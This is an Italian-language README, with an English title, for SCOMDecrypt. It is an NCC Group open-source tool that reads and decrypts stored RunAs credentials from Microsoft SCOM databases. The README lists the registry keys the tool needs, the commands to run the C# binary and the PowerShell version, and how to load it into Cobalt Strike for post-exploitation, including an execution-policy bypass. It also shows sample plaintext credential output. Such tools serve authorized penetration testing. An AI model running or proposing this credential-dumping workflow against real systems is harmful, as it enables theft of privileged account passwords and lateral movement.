
SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers
Pubblicato come open source da NCC Group Plc - http://www.nccgroup.trust/
Sviluppato da Richard Warren, richard [punto] warren [chiocciola] nccgroup [punto] trust
http://www.github.com/nccgroup/SCOMDecrypt
Rilasciato sotto AGPL, vedere LICENSE per maggiori informazioni
Questo strumento è progettato per recuperare e decrittare le credenziali RunAs memorizzate nei database di Microsoft System Center Operations Manager (SCOM).
Per ulteriori informazioni, si prega di consultare il post sul blog di NCC Group qui
Per eseguire lo strumento sono necessari privilegi amministrativi sul server SCOM. È inoltre necessario disporre dell'accesso in lettura alla seguente chiave di registro:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\MOMBins
È possibile verificare manualmente di poter vedere il database recuperando i dettagli di connessione dalle seguenti chiavi:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName
Lo strumento è disponibile in due formati. Il primo è un binario C# che può essere semplicemente eseguito sul server SCOM senza argomenti come segue:
.\SCOMDecrypt.exe
[+] <SCXUser><UserId>bob</UserId><Elev>sudo</Elev></SCXUser>:H a c k T h e P l a n e t
[+] administrator:W i n t e r 2 0 1 5 !
[+] alice:P a s s w 0 r d 1 2 3 !
Esiste anche una versione PowerShell dello strumento. Questa è utile in uno scenario di post-exploitation per l'uso con strumenti come Cobalt Strike o Empire. Per utilizzare lo strumento con Cobalt Strike:
powershell-import C:\path\to\SCOMDecrypt.ps1
powershell Invoke-SCOMDecrypt
[+] <SCXUser><UserId>bob</UserId><Elev>sudo</Elev></SCXUser>:H a c k T h e P l a n e t
[+] administrator:W i n t e r 2 0 1 5 !
[+] alice:P a s s w 0 r d 1 2 3 !
Per eseguirlo nella console PowerShell:
powershell.exe -exec bypass
. .\Invoke-SCOMDecrypt.ps1
Invoke-SCOMDecrypt
...